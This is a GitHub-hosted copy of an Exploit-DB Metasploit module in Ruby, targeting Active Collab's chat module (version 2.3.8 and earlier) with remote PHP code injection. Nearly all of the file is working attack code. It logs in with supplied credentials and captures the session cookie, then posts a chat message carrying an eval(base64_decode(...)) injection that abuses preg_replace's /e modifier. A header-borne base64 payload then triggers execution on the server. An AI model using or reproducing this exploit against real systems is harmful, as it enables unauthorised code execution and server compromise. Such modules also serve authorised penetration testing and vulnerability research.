forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path18898.rb
More file actions
executable file
·146 lines (129 loc) · 4.41 KB
/
Copy path18898.rb
File metadata and controls
executable file
·146 lines (129 loc) · 4.41 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Active Collab "chat module" <= 2.3.8 Remote PHP Code Injection Exploit',
'Description' => %q{
This module exploits an arbitrary code injection vulnerability in the chat module
that is part of Active Collab by abusing a preg_replace() using the /e modifier and
its replacement string using double quotes. The vulnerable function can be found in
activecollab/application/modules/chat/functions/html_to_text.php.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steventhomasseeley[at]gmail.com>', # vuln discovery & msf module
],
'References' =>
[
['URL', 'http://www.activecollab.com/downloads/category/4/package/62/releases'],
],
'Privileged' => false,
'Payload' =>
{
'Keys' => ['php'],
'Space' => 4000,
'DisableNops' => true,
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['Automatic',{}]],
'DisclosureDate' => 'May 30 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI',[true, "The path to the ActiveCollab installation", "/"]),
OptString.new('USER',[true, "The username (e-mail) to authenticate with"]),
OptString.new('PASS',[true, "The password to authenticate with"])
],self.class)
end
def check
login_path = "public/index.php?path_info=login&re_route=homepage"
uri = datastore['URI']
uri += (datastore['URI'][-1, 1] == "/") ? login_path : "/#{login_path}"
cms = send_request_raw({'uri' => uri}, 25)
uri = datastore['URI']
uri += (datastore['URI'][-1, 1] == "/") ? 'public/assets/modules/chat/' : '/public/assets/modules/chat/'
chat = send_request_raw({'uri' => uri}, 25)
# cant detect the version here
if (cms and cms.body =~ /powered by activeCollab/)
# detect the chat module
if (chat and chat.code == 200)
return Exploit::CheckCode::Vulnerable
end
end
return Exploit::CheckCode::Safe
end
def exploit
user = datastore['USER']
pass = datastore['PASS']
p = Rex::Text.encode_base64(payload.encoded)
header = rand_text_alpha_upper(3)
login_uri = datastore['URI']
login_uri += (datastore['URI'][-1, 1] == "/") ? 'public/index.php?path_info=login' : '/public/index.php?path_info=login'
# login
res = send_request_cgi({
'method' => 'POST',
'uri' => login_uri,
'vars_post' =>
{
'login[email]' => user,
'login[password]' => pass,
'submitted' => "submitted",
}
}, 40)
# response handling
if res.code == 302
if (res.headers['Set-Cookie'] =~ /ac_ActiveCollab_sid_eaM4h3LTIZ=(.*); expires=/)
acsession = $1
end
elsif res.body =~ /Failed to log you in/
print_error("Could not login to the target application, check your credentials")
elsif res.code != 200 or res.code != 302
print_error("Server returned a failed status code: (#{res.code})")
end
# injection
iuri = datastore['URI']
iuri += (datastore['URI'][-1, 1] == "/") ? 'index.php' : '/index.php'
iuri << "?path_info=chat/add_message&async=1"
phpkode = "{\${eval(base64_decode(\$_SERVER[HTTP_#{header}]))}}"
injection = "<th>\");#{phpkode}</th>"
cookies = "ac_ActiveCollab_sid_eaM4h3LTIZ=#{acsession}"
res = send_request_cgi({
'method' => 'POST',
'uri' => iuri,
'headers' =>
{
'cookie' => cookies
},
'vars_post' =>
{
'submitted' => "submitted",
'message[message_text]' => injection,
'message[chat_id]' => "1",
'message[posted_to_user_id]' => "all"
}
}, 25)
euri = datastore['URI']
euri += (datastore['URI'][-1, 1] == "/") ? 'public/index.php' : '/public/index.php'
euri << "?path_info=/chat/history/1"
# execution
res = send_request_cgi({
'method' => 'POST',
'uri' => euri,
'headers' =>
{
header => p,
'cookie' => cookies
}
})
end
end